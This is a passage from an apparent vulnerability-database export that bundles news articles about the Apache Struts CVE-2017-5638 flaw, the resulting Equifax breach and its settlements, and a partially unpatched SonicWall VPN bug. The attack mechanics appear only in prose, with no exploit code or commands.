Admins can also switch to a different [implementation](<https://cwiki.apache.org/confluence/display/WW/File+Upload#FileUpload-AlternateLibraries>) of the Multipart parser.\n", "cvss3": {}, "published": "2017-03-09T01:03:00", "type": "thn", "title": "New Apache Struts Zero-Day Vulnerability Being Exploited in the Wild", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2017-03-09T12:03:10", "id": "THN:2707247140A4F620671B33D68FEB1EA9", "href": "https://thehackernews.com/2017/03/apache-struts-framework.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-27T09:17:53", "description": "[](<https://4.bp.blogspot.com/-7t3BApLnYmI/WdM9FFq_vsI/AAAAAAAAATQ/KVrOmkm6SzoTm_8rLuSGnUbnhJudoRXwwCLcBGAs/s1600/equifax-data-breach.png>)\n\n[Equifax data breach](<https://thehackernews.com/2017/09/equifax-data-breach.html>) was bigger than initially reported, exposing highly sensitive information of more Americans than previously revealed. \n \nCredit rating agency Equifax says an additional 2.5 million U.S. consumers were also impacted by the massive data breach the company disclosed last month, bringing the total possible victims to 145.5 million from 143 million. \n \nEquifax last month announced that it had suffered a massive data breach that exposed highly sensitive data of hundreds of millions of its customers, which includes names, social security numbers, dates of birth and addresses. \n \nIn addition, credit card information for [nearly 209,000 customers](<https://thehackernews.com/2017/09/equifax-credit-report-hack.html>) was also stolen, as well as certain documents with personally identifying information (PII) for approximately 182,000 Equifax consumers. 
\n \nThe breach was due to a critical vulnerability ([CVE-2017-5638](<https://thehackernews.com/2017/03/apache-struts-framework.html>)) in the Apache Struts 2 framework, which Apache had patched (on March 6) more than two months before the security incident. \n \nEquifax was even [informed by the US-CERT](<https://thehackernews.com/2017/09/equifax-apache-struts.html>) on March 8 to patch the flaw, but the company failed to identify or patch its systems against the issue, Equifax ex-CEO Richard Smith said in a statement [[PDF](<http://docs.house.gov/meetings/IF/IF17/20171003/106455/HHRG-115-IF17-Wstate-SmithR-20171003.pdf>)] to the House Committee on Energy and Commerce. \n\n\n> \"It appears that the breach occurred because of both human error and technology failures,\" Smith said. \"Equifax's information security department also ran scans that should have identified any systems that were vulnerable to the Apache Struts issue...Unfortunately, however, the scans did not identify the Apache Struts vulnerability.\"\n\nIn the wake of the security incident, the company hired FireEye-owned security firm Mandiant to investigate the breach, which has now concluded the forensic portion of its investigation and plans to release the results \"promptly.\" \n \nMandiant said a total of 145.5 million consumers might now potentially have been [impacted by the breach](<https://thehackernews.com/2017/09/equifax-data-breach.html>), which is 2.5 million more than previously estimated. However, the firm did not identify any evidence of \"new attacker activity.\" \n\n\n> \"Mandiant did not identify any evidence of additional or new attacker activity or any access to new databases or tables,\" Equifax said in a Monday [press release](<https://investor.equifax.com/news-and-events/news/2017/10-02-2017-213238821>). 
\n\n> \"Instead, this additional population of consumers was confirmed during Mandiant's completion of the remaining investigative tasks and quality assurance procedures built into the investigative process.\"\n\nThe forensic investigation also found that approximately 8,000 Canadian consumers were also impacted, which is much lower than the 100,000 initially estimated figure by the credit rating and reporting firm. \n \nHowever, Equifax said that this figure \"was preliminary and did not materialize.\" \n \n\"I want to apologize again to all impacted consumers. As this important phase of our work is now completed, we continue to take numerous steps to review and enhance our cybersecurity practices,\" newly appointed interim CEO, Paulino do Rego Barros, Jr. said. \n \n\"We also continue to work closely with our internal team and outside advisors to implement and accelerate long-term security improvements.\" \n \nEquifax, which maintains data on over 820 million consumers and over 91 million businesses worldwide, also said the company would update its own notification by October 8 for its customers who want to check if they were among those affected by the data breach.\n", "cvss3": {}, "published": "2017-10-02T21:23:00", "type": "thn", "title": "Whoops, Turns Out 2.5 Million More Americans Were Affected By Equifax Breach", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2017-10-03T08:23:36", "id": "THN:ACD3479531482E2CA5A8E15EB6B47523", "href": "https://thehackernews.com/2017/10/equifax-credit-security-breach.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-27T09:17:55", "description": "[](<https://3.bp.blogspot.com/-F7ViQ9JXvL8/Wbo_3TiAKWI/AAAAAAAAAJM/fsHVxS_O8ysIy4sZ2wdnG1OfLkiNJTjzgCLcBGAs/s1600/equifax-apache-struts.png>)\n\nThe [massive Equifax data breach](<https://thehackernews.com/2017/09/equifax-data-breach.html>) that exposed highly sensitive 
data of as many as 143 million people was caused by [exploiting a flaw in Apache Struts](<https://thehackernews.com/2017/03/apache-struts-framework.html>) framework, which Apache had patched more than two months before the security incident, Equifax has confirmed. \n \nCredit rating agency Equifax is yet another example of the companies that became victims of massive cyber attacks due to not patching a critical vulnerability on time, for which patches had already been issued by the respective vendors. \n \nRated critical with a maximum 10.0 score, the Apache Struts2 vulnerability (CVE-2017-5638) exploited in the Equifax breach was disclosed and fixed by Apache on March 6 with the release of Apache Struts version 2.3.32 or 2.5.10.1. \n \nThis flaw is separate from CVE-2017-9805, [another Apache Struts2 vulnerability](<https://thehackernews.com/2017/09/apache-struts-vulnerability.html>) that was patched earlier this month, which was a programming bug that manifests due to the way the Struts REST plugin handles XML payloads while deserializing them, and was fixed in Struts version 2.5.13. \n \nRight after the disclosure of the vulnerability, hackers started actively exploiting the flaw in the wild to install rogue applications on affected web servers after its [proof-of-concept (PoC) exploit code](<https://thehackernews.com/2017/03/apache-struts-framework.html>) was uploaded to a Chinese site. \n \nDespite patches being available and proof that the flaw was already under mass attack by hackers, Equifax failed to patch its web applications against the flaw, which resulted in the breach of personal data of [nearly half of the US population](<https://thehackernews.com/2017/09/equifax-credit-report-hack.html>). 
\n\n\n> \"Equifax has been intensely investigating the scope of the intrusion with the assistance of a leading, independent cyber security firm to determine what information was accessed and who have been impacted,\" the company officials wrote in an [update on the website](<https://www.equifaxsecurity2017.com/>) with a new \"A Progress Update for Consumers.\" \n\n> \"We [know that](<https://www.equifaxsecurity2017.com/2017/09/13/progress-update-consumers-4/>) criminals exploited a US website application vulnerability. The vulnerability was Apache Struts CVE-2017-5638. We continue to work with law enforcement as part of our criminal investigation, and have shared indicators of compromise with law enforcement.\"\n\nCVE-2017-5638 was a then-zero-day vulnerability discovered in the [popular Apache Struts](<https://thehackernews.com/2017/09/apache-struts-flaws-cisco.html>) web application framework by Cisco's Threat intelligence firm Talos, which observed a number of active attacks exploiting the flaw. \n \nThe issue was a remote code execution bug in the Jakarta Multipart parser of Apache Struts2 that could allow an attacker to execute malicious commands on the server when uploading files based on the parser. \n \nAt the time, Apache warned it was possible to perform a remote code execution attack with \"a malicious Content-Type value,\" and if this value is not valid \"an exception is thrown which is then used to display an error message to a user.\" \n \n**Also Read: **[Steps You Should Follow to Protect Yourself From Equifax Breach](<https://thehackernews.com/2017/09/equifax-data-breach.html>) \n \nFor those unaware, Apache Struts is a free, open-source MVC framework for developing web applications in the Java programming language that run both front-end and back-end Web servers. The framework is used by 65n per cent of the Fortune 100 companies, including Lockheed Martin, Vodafone, Virgin Atlantic, and the IRS. 
\n \nSince the hackers are actively exploiting the vulnerabilities in the Apache Struts web framework, Cisco has also [initiated an investigation](<https://thehackernews.com/2017/09/apache-struts-flaws-cisco.html>) into its products against four newly discovered security vulnerabilities in Apache Struts2. \n \nOther companies that also incorporate a version of Apache Struts 2 should also check their infrastructures against these vulnerabilities. \n \nEquifax is currently offering free credit-monitoring and identity theft protection services for people who are affected by the massive data leak and has also enabled a security freeze for access to people's information. \n \nWhile the company was initially criticised for generating a PIN that was simply a time and date stamp and easy-to-guess, the PIN generation method was later changed to randomly generate numbers.\n", "cvss3": {}, "published": "2017-09-13T21:38:00", "type": "thn", "title": "Equifax Suffered Data Breach After It Failed to Patch Old Apache Struts Flaw", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-5638", "CVE-2017-9805"], "modified": "2017-09-15T10:00:54", "id": "THN:6C0E5E35ABB362C8EA341381B3DD76D6", "href": "https://thehackernews.com/2017/09/equifax-apache-struts.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2022-05-09T12:37:55", "description": "[](<https://thehackernews.com/images/-SD858Cx0SIo/YNK2gCP0mWI/AAAAAAAAC9U/CUkLKG6oVs8GdJbW6x6S3s1PA6DZGLEFwCLcBGAsYHQ/s0/sonicwall-vpn-hacking.jpg>)\n\nA critical vulnerability in SonicWall VPN appliances that was believed to have been patched last year has been now found to be \"botched,\" with the company leaving a memory leak flaw unaddressed, until now, that could permit a remote attacker to gain access to sensitive information.\n\nThe shortcoming was rectified in an update rolled out to SonicOS on June 22. 
\n\nTracked as [CVE-2021-20019](<https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0006>) (CVSS score: 5.3), the vulnerability is the consequence of a memory leak when sending a specially-crafted unauthenticated HTTP request, culminating in information disclosure.\n\nIt's worth noting that SonicWall's decision to hold back the patch comes amid [multiple](<https://thehackernews.com/2021/02/hackers-exploiting-critical-zero-day.html>) [zero-day](<https://thehackernews.com/2021/04/3-zero-day-exploits-hit-sonicwall.html>) [disclosures](<https://thehackernews.com/2021/04/hackers-exploit-sonicwall-zero-day-bug.html>) affecting its remote access VPN and email security products that have been exploited in a series of in-the-wild attacks to deploy backdoors and a new strain of ransomware called FIVEHANDS.\n\nHowever, there is no evidence that the flaw is being exploited in the wild.\n\n[](<https://thehackernews.com/images/-m0gO5jwXUhQ/YNLCVzXwu3I/AAAAAAAAC9c/uxaOtb-jqc4cX5OSKdFx5YV65cl6P_KwQCLcBGAsYHQ/s0/memory-dump.jpg>) \n--- \nMemory Dump PoC \n \n\"SonicWall physical and virtual firewalls running certain versions of SonicOS may contain a vulnerability where the HTTP server response leaks partial memory,\" SonicWall said in an [advisory](<https://www.sonicwall.com/support/product-notification/?sol_id=210621114540820>) published Tuesday. 
\"This can potentially lead to an internal sensitive data disclosure vulnerability.\"\n\nThe original flaw, identified as [CVE-2020-5135](<https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2020-0010>) (CVSS score: 9.4), concerned a buffer overflow vulnerability in SonicOS that could allow a remote attacker to cause denial-of-service (DoS) and potentially execute arbitrary code by sending a malicious request to the firewall.\n\nWhile SonicWall rolled out a patch in October 2020, additional testing undertaken by cybersecurity firm Tripwire revealed a memory leak as a \"result of an improper fix for CVE-2020-5135,\" according to security researcher Craig Young, who reported the new issue to SonicWall on October 6, 2020.\n\n\"As a one- or two-line fix with minimal impact, I had expected that a patch would probably come out quickly but, fast-forward to March and I still had not heard back,\" Young [noted](<https://www.tripwire.com/state-of-security/featured/analyzing-sonicwalls-unsuccessful-fix-for-cve-2020-5135/>) in a write-up on Tuesday. \"I reconnected with their PSIRT on March 1, 2021 for an update, but ultimately it took until well into June before an advisory could be released.\"\n\n \n\n\nFound this article interesting? 
Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-23T05:11:00", "type": "thn", "title": "SonicWall Left a VPN Flaw Partially Unpatched Amidst 0-Day Attacks", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-5135", "CVE-2021-20019"], "modified": "2021-06-23T05:35:59", "id": "THN:D6FED8C7635FDB50C271368C9373B439", "href": "https://thehackernews.com/2021/06/sonicwall-left-vpn-flaw-partially.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "threatpost": [{"lastseen": "2018-10-06T22:53:59", "description": "Public attacks and scans looking for exposed Apache webservers have ramped up dramatically since Monday when a vulnerability in the Struts 2 web application framework was [patched](<https://cwiki.apache.org/confluence/display/WW/S2-045>) and proof-of-concept exploit code was introduced into Metasploit.\n\nThe vulnerability, 
[CVE-2017-5638](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5638>), was already under attack in the wild prior to Monday\u2019s disclosure, but since then, the situation has worsened and experts fear it\u2019s going to linger for a while.\n\n\u201cThe second someone starts working on a [Metasploit module](<https://github.com/rapid7/metasploit-framework/issues/8064>), it\u2019s a ramp-up for rapid exploitation by a large number of people,\u201d said Craig Williams, senior technical leader for Cisco\u2019s Talos research outfit. \u201cWe\u2019re basically seeing a huge number of people continue to exploit the vulnerability. That\u2019s likely going to continue to increase. I think what we\u2019re also going to see is people going to try to scan for the vulnerability.\u201d\n\nThe flaw lives in the Jakarta Multipart parser upload function in Apache Struts. It allows an attacker to easily make a maliciously crafted request (a malicious Content-Type value) to an Apache webserver and have it execute. Struts 2.3.5 to Struts 2.3.31 are affected as are Struts 2.5 to 2.5.10; admins are urged to upgrade immediately to [Struts 2.3.32](<https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.3.32>) or [2.5.10.1](<https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.5.10.1>).\n\nTalk of the vulnerability surfaced on Chinese forums, according to Vincente Motos, who posted an advisory on the [HackPlayers](<http://www.hackplayers.com/2017/03/exploit-rce-para-apache-struts-cve-2017-5638.html>) website. Motos said a notorious Apache Struts hacker known as Nike Zheng posted a public proof-of-concept exploit demonstrating the simplicity with which an attacker could inject operating system commands.\n\nThe attacks are particularly risky to anyone running their Apache webservers as root, which is not a suggested practice. 
Williams said it\u2019s unclear whether an attacker can benignly scan for vulnerable servers in order to determine the version and context under which Struts is running, whether as Apache or root, for example. But as with some older internet-wide bugs, there are a large number of scans happening.\n\n\u201c[Attacks] look like requests to a webserver with a malformed piece,\u201d Williams said. \u201cUnless you\u2019re looking for it, it\u2019s easy not to see the malformed content type.\u201d\n\nAn attacker, he said, would need to just modify one line depending on the operating system the target is running, Windows or Linux, and have it download a malicious binary from the web.\n\n\u201cUnfortunately, due to the nature of command-line injections like this, it\u2019s very easy to modify,\u201d Williams said. \u201cAnd that\u2019s why I think we\u2019re going to continue to see exploitation rise for the foreseeable future.\u201d\n\nThe risks are severe for an organization running an exposed Apache server if it\u2019s compromised.\n\n\u201cThe sky\u2019s the limit,\u201d Williams said. \u201cIf I\u2019m a bad guy, depending on what my game is, I can take over your webserver and use that to move laterally through your network. If I\u2019m super insidious, I can use that to look for your domain controller and if I can find a way to compromise your password hashes, say from the Linux server I compromised, I can possibly log in to your domain controller and use that to push malware to all your machines. 
I could ransom off your webserver, all kinds of terrible things.\u201d\n\nWilliams said [Cisco has observed](<http://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html>) that the majority of public attacks feature a number of Linux bots used for DDoS attacks taking advantage of this vulnerability, along with an IRC bouncer, and a malware sample related to the Bill Gates botnet.\n\nWilliams cautioned as well that connected devices in the IoT space could also be a major concern, since Struts 2 likely runs there.\n\n\u201cI\u2019m going to guess there\u2019s a reasonable number of devices running it, and due to the nature of IoT, those aren\u2019t going to be patched any time soon. So this is going to be an issue for the foreseeable future.\u201d\n\nGiven the availability of patches and detection rules, it\u2019s likely that public attacks are going to be largely mitigated and as more detection rules surface, public exploits should be less useful to attackers.\n\n\u201cDue to the fact that it\u2019s relatively easy to go inside and modify an attack, it\u2019s going to be bad and it\u2019s going to plague us for some time,\u201d Williams said. 
\u201cGood news is that detecting it is not that difficult.\u201d\n", "cvss3": {}, "published": "2017-03-09T12:25:46", "type": "threatpost", "title": "Attacks Heating Up Against Apache Struts 2 Vulnerability", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2017-03-09T19:50:52", "id": "THREATPOST:1C2F8B65F8584E9BF67617A331A7B993", "href": "https://threatpost.com/attacks-heating-up-against-apache-struts-2-vulnerability/124183/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-01-23T05:27:47", "description": "Equifax said that an additional 2.4 million Americans have had their [personal data](<https://investor.equifax.com/news-and-events/news/2018/03-01-2018-140531340>) stolen as part of the company\u2019s massive 2017 data breach, including their names and some of their driver\u2019s license information.\n\nThe additional identified victims bring the total of those implicated in what has become the largest data breach of personal information in history to around 148 million people.\n\nThe consumer credit reporting agency on Thursday said that as part of an \u201congoing analysis\u201d it found that these newly identified victims\u2019 names and partial driver\u2019s license numbers were stolen by attackers. However, unlike the previous 145.5 million people who have been identified to date as impacted by the 2017 breach, the Social Security numbers of these additional victims were not impacted.\n\nAttackers were also unable to reach additional license details for this latest slew of impacted victims \u2013 including the state where their licenses were issued and the expiration dates.\n\n\u201cThis is not about newly discovered stolen data,\u201d Paulino do Rego Barros, Jr., interim chief executive officer of Equifax, said in a statement. 
\u201cIt\u2019s about sifting through the previously identified stolen data, analyzing other information in our databases that was not taken by the attackers, and making connections that enabled us to identify additional individuals.\u201d\n\nEquifax said the new victims were not previously identified because their Social Security numbers were not stolen together with their driver\u2019s license information.\n\n\u201cThe methodology used in the company\u2019s forensic examination of last year\u2019s cybersecurity incident leveraged Social Security Numbers (SSNs) and names as the key data elements to identify who was affected by the cyberattack,\u201d said the company in a statement. \u201cThis was in part because forensics experts had determined that the attackers were predominately focused on stealing SSNs.\u201d\n\nEquifax said it will notify the newly identified consumers directly by U.S. Postal mail, \u201cand will offer identity theft protection and credit file monitoring services at no cost to them,\u201d said the company.\n\nThe company did not respond to requests for further comment from Threatpost about its current ongoing analysis of the breach.\n\n**Ongoing Breach Disclosures**\n\nEquifax has been under public scrutiny since September, when it first disclosed the data breach, stating at the time that cybercriminals had exploited an unnamed \u201cU.S. website application vulnerability to gain access to certain files\u201d from May through July 2017. Equifax said it discovered the breach on July 29. The breach enabled criminals to access sensitive data like social security numbers, birth dates, and license numbers.\n\nLater, during Equifax\u2019s testimony in October before the U.S. 
House Committee on Energy and Commerce Subcommittee on Digital Commerce and Consumer Protection, it was revealed that Equifax was notified in March that the breach was tied to an unpatched [Apache Struts vulnerability, CVE-2017-5638](<https://threatpost.com/oracle-patches-apache-struts-reminds-users-to-update-equifax-bug/128151/>). It was established that while Equifax said it had requested the \u201capplicable personnel responsible\u201d to update the vulnerability it never was fixed.\n\n\u201cIt appears that the breach occurred because of both human error and technology failures,\u201d Richard Smith, Equifax CEO at the time, wrote in a [testimony](<http://docs.house.gov/meetings/IF/IF17/20171003/106455/HHRG-115-IF17-Wstate-SmithR-20171003.pdf>) that was released at the hearing in October.\n\nMaking the breach worse was Equifax\u2019s further botched response to the breach.\n\nAfter the breach was revealed in September, the company\u2019s site was crushed with traffic from concerned customers that left the site unreachable. In a separate instance in October, the Equifax site came under fire for harboring [adware](<https://threatpost.com/equifax-takes-down-compromised-page-redirecting-to-adware-download/128406/>) in a third-party partner\u2019s Flash Player download.\n\nThe extent and scope of the breach also has been continually expanding since it was first disclosed in September. 
In October, after an analysis with security company Mandiant, the company said that an [additional](<https://threatpost.com/equifax-says-145-5m-affected-by-breach-ex-ceo-testifies/128247/>) 2.5 million customers were also impacted on top of the 143 million the company initially said were affected.\n\nMeanwhile, in February, documents submitted by Equifax to the US Senate Banking Committee revealed that attackers also accessed taxpayer identification numbers, email addresses, and credit card expiration dates for certain customers.\n\n**Renewed Anger**\n\nThis latest slew of impacted customers has renewed anger against the company, with some demanding stricter legislation for data protection \u2013 such as the proposed Data Breach Prevention and Compensation Act, which would impose strict security-related fines on credit reporting agencies.\n\n> My office is continuing our investigation of [#Equifax](<https://twitter.com/hashtag/Equifax?src=hash&ref_src=twsrc%5Etfw>) so we can get to the bottom of how this disastrous data breach happened. \n> \n> We also need to change the law.\n> \n> \u2014 Eric Schneiderman (@AGSchneiderman) [March 1, 2018](<https://twitter.com/AGSchneiderman/status/969229077814108160?ref_src=twsrc%5Etfw>)\n\n> This is unacceptable. The California Department of Justice will continue to get to the bottom of this massive cybersecurity incident. We are committed to holding [#Equifax](<https://twitter.com/hashtag/Equifax?src=hash&ref_src=twsrc%5Etfw>) accountable to the fullest extent of the law. 
<https://t.co/fRPrUWcIyg>\n> \n> \u2014 Xavier Becerra (@AGBecerra) [March 1, 2018](<https://twitter.com/AGBecerra/status/969330796774359040?ref_src=twsrc%5Etfw>)\n\nEquifax, meanwhile, continues to remain under investigation by several federal and state agencies, including a probe by the Consumer Financial Protection Bureau.\n\nCustomers can see if their personal information has been breached by clicking on an \u201cAm I Impacted\u201d tool on Equifax\u2019s [website](<https://www.equifaxsecurity2017.com/>). The company also advised consumers to visit its web portal where they can review their account statements and credit reports, identify any unauthorized activity, and protect their personal information from attack.\n\nThe company handles data on more than 820 million customers and 91 million businesses worldwide.\n", "cvss3": {}, "published": "2018-03-02T15:12:57", "type": "threatpost", "title": "Equifax Says 2.4 Million More People Impacted By Massive 2017 Breach", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2018-03-02T15:12:57", "id": "THREATPOST:AD5395CA5B3FD95FAD8E67B675D0AFCA", "href": "https://threatpost.com/equifax-adds-2-4-million-more-people-to-list-of-those-impacted-by-2017-breach/130209/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-04-11T11:42:25", "description": "Equifax will pay as much as $700 million to settle federal and state investigations on the heels of its infamous 2017 breach, which exposed the data of almost 150 million customers.\n\nThe consumer credit reporting agency on Monday [said](<https://investor.equifax.com/news-and-events/news/2019/07-22-2019-125543228>) it will dish out $300 million to cover free credit monitoring services for impacted consumers, $175 million to 48 states in the U.S, and $100 million in civil penalties to the Consumer Financial Protection Bureau (CFPB). 
If the initial amount does not cover consumer losses, the company may need to pay an additional $125 million.\n\n\u201cCompanies that profit from personal information have an extra responsibility to protect and secure that data,\u201d said Federal Trade Commission (FTC) Chairman Joe Simons [in a statement](<https://www.ftc.gov/news-events/press-releases/2019/07/equifax-pay-575-million-part-settlement-ftc-cfpb-states-related?utm_source=slider>). \u201cEquifax failed to take basic steps that may have prevented the breach that affected approximately 147 million consumers. This settlement requires that the company take steps to improve its data security going forward, and will ensure that consumers harmed by this breach can receive help protecting themselves from identity theft and fraud.\u201d\n\nEquifax, which handles data associated with more than 820 million customers and 91 million businesses worldwide, has been under public scrutiny since September 2017 when [it disclosed](<https://threatpost.com/equifax-says-breach-affects-143-million-americans/127880/>) a data breach that impacted almost 150 million Americans. The attackers managed to [access information](<https://threatpost.com/equifax-data-nation-state/141929/>) containing Social Security numbers, birth dates, addresses, and some driver\u2019s license numbers. 
Equifax said it discovered the intrusion on July 29, meaning attackers apparently had access to the company\u2019s files for nearly 12 weeks.\n\nAfter the data breach, Equifax was hit by multiple lawsuits, as well as investigations by the FTC, the CFPB, the Attorneys General of 48 states, and more.\n\nLawsuits claimed that Equifax failed to patch its network in March 2017 after being alerted to a [critical security flaw](<https://threatpost.com/equifax-adds-2-4-million-more-people-to-list-of-those-impacted-by-2017-breach/130209/>) (an Apache Struts vulnerability, CVE-2017-5638) in its Equifax Automated Consumer Interview System database (which handles inquiries from consumers about their personal credit data). This vulnerability was ultimately exploited by bad actors, leading to the data breach.\n\nAs part of the agreement, Equifax also said it will take steps to enhance its information security and technology program, as well as make payments totaling $290.5 million to state and federal regulatory agencies to pay attorneys\u2019 fees and costs in the multi-district litigation.\n\nIn the past month, a slew of fines and penalties have been imposed that were tied to privacy and data breach incidents. Earlier in July, the [FTC slapped](<https://threatpost.com/privacy-experts-facebooks-5b-fine/146478/>) a $5 billion fine on Facebook for privacy violations following its Cambridge Analytica incident. 
Also hit with security-related fines in July were [Marriott](<https://threatpost.com/marriott-123m-fine-data-breach/146320/>) ($123 million) and [British Airways](<https://threatpost.com/post-data-breach-british-airways-slapped-with-record-230m-fine/146272/>) ($230 million).\n\nWhile opinions are mixed about the appropriate penalty for these companies and Equifax, security experts for their part hope that other companies will take note of the fines when it comes to data security and privacy.\n\n\u201cI\u2019m far from an Equifax apologist, but the truth is it could have been anyone,\u201d Adam Laub, chief marketing officer at STEALTHbits Technologies said in an email. \u201cIt\u2019s not an excuse, but rather the reality we live in. The best outcome isn\u2019t Equifax making the situation right \u2013 although that is important for all of those affected \u2013 it\u2019s everyone else learning that the price to be paid outweighs the inconvenience of ensuring proper measures are taken to secure the data that puts them at risk in the first place. And it\u2019s got to be from the ground up too. There\u2019s no silver bullet.\u201d\n\n**_Interested in more on patch management? Don\u2019t miss our free live _**[**_Threatpost webinar_**](<https://attendee.gotowebinar.com/register/1579496132196807171?source=ART>)**_, \u201c_****_Streamlining Patch Management,\u201d on Wed., July 24, at 2:00 p.m. EDT. Please join Threatpost editor Tom Spring and a panel of patch experts as they discuss the latest trends in Patch Management, how to find the right solution for your business and what the biggest challenges are when it comes to deploying a program. 
_****_[Register and Learn More](<https://attendee.gotowebinar.com/register/1579496132196807171?source=ART>)_**\n", "cvss3": {}, "published": "2019-07-22T14:31:39", "type": "threatpost", "title": "Equifax to Pay $700 Million in 2017 Data Breach Settlement", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2019-07-22T14:31:39", "id": "THREATPOST:5ADABEB29891532ECFF2D6ABD99CAED4", "href": "https://threatpost.com/equifax-to-pay-700-million-in-2017-data-breach-settlement/146579/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-10-06T22:53:58", "description": "Malicious traffic stemming from exploits against the [Apache Struts 2 vulnerability](<https://threatpost.com/attacks-heating-up-against-apache-struts-2-vulnerability/124183/>) disclosed and [patched](<https://cwiki.apache.org/confluence/display/WW/S2-045>) this week has tapered off since Wednesday.\n\nResearchers at Rapid7 published an [analysis](<https://community.rapid7.com/community/infosec/blog/2017/03/09/apache-jakarta-vulnerability-attacks-in-the-wild>) of data collected from its honeypots situated on five major cloud providers and a number of private networks that shows a couple of dozen sources have targeted this vulnerability, but only two, originating in China, have actually sent malicious commands.\n\nCisco Talos said on Thursday that attacks had [risen sharply](<http://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html>) since word leaked of publicly available exploits and a [Metasploit module](<https://github.com/rapid7/metasploit-framework/issues/8064>). But it conceded that it was difficult to ascertain whether probes for vulnerable Apache servers could be carried out benignly.\n\nRapid7 said that in a 72-hour period starting Tuesday, a handful of events cropped up peaking at fewer than 50 between 11 a.m. and 6 p.m. 
Wednesday.\n\n\u201cWe are really seeing limited attempts to exploit the vulnerability,\u201d said Tom Sellers, threat analyst and security researcher at Rapid7. \u201cFor context, please keep in mind that our data is from honeypots hosted in cloud providers and may not reflect what other sensors and organizations are seeing.\u201d\n\nCraig Williams, Cisco Talos senior technical lead, said researchers there are seeing attack traffic trending downward as well.\n\n\u201cEarly indicators and past experiences were pointing to this being an ongoing issue with attackers continuing to seek out vulnerable machines. Interestingly, over the last couple days, we have seen a slowing of activity,\u201d Williams said. \u201cBecause this is so unusual, we are continuing to monitor the situation in case the trend starts moving in the other direction. Again, this is not typical for this type of issue but great news all the same.\u201d\n\nThe vulnerability is in the Jakarta Multipart parser that comes with Apache Struts. An attacker can trivially exploit the vulnerability to gain remote code execution by sending an HTTP request that contains a crafted Content-Type value. The vulnerable software will throw an exception in such cases.\n\n\u201cWhen the software is preparing the error message for display, a flaw in the Apache Struts Jakarta Multipart parser causes the malicious Content-Type value to be executed instead of displayed,\u201d Sellers wrote in an analysis published yesterday.\n\nThe vulnerability was disclosed and patched on Monday, and by Tuesday, Rapid7 was seeing two malicious requests from a host geo-located in Zhengzhou, China. The attacks arrived in HTTP GET requests and issued commands to the vulnerable webserver for it to download binaries from the attacker-controlled server on the internet. 
Sellers called it a standard command-injection attack against a webserver where the attacker is able to write code that instructs the server to reach out to an IP address and download code that executes on the server.\n\nThe second attack was spotted Wednesday when a host in Shanghai, China sent HTTP POST requests to servers instructing them to disable their firewall and grab code related to the XOR DDoS malware family.\n\n\u201cWhile we\u2019ve seen a couple dozen sources exploiting the vulnerability, only those two issued malicious commands,\u201d Sellers said. \u201cWe\u2019ve actually seen a drop off in related traffic since Wednesday. The most active attacker stopped on Thursday around 4 a.m. U.S. Central time.\u201d\n\nSellers said it\u2019s unclear why there\u2019s been a drop-off in malicious traffic.\n\n\u201cIt could be caused by a number of factors. The malicious payload is pretty obvious and easy to filter if traffic is inspected,\u201d Sellers said. \u201cAttackers might be prioritizing other vulnerabilities such as the ones announced in cameras recently. The lull may be temporary and we may see activity rise again after attention moves on to efforts.\u201d\n\nCisco raised the issue of IoT devices running the vulnerable Apache software as well, which could be an indicator of initial interest from DDoS bots.\n\n\u201cGiven the low sample size it\u2019s difficult for me to say. It\u2019s possible that DDoS bots are the early adopters since infection would generate easy, repeatable income and the code was trivial to port to existing frameworks,\u201d Sellers said. \u201cCompare that to 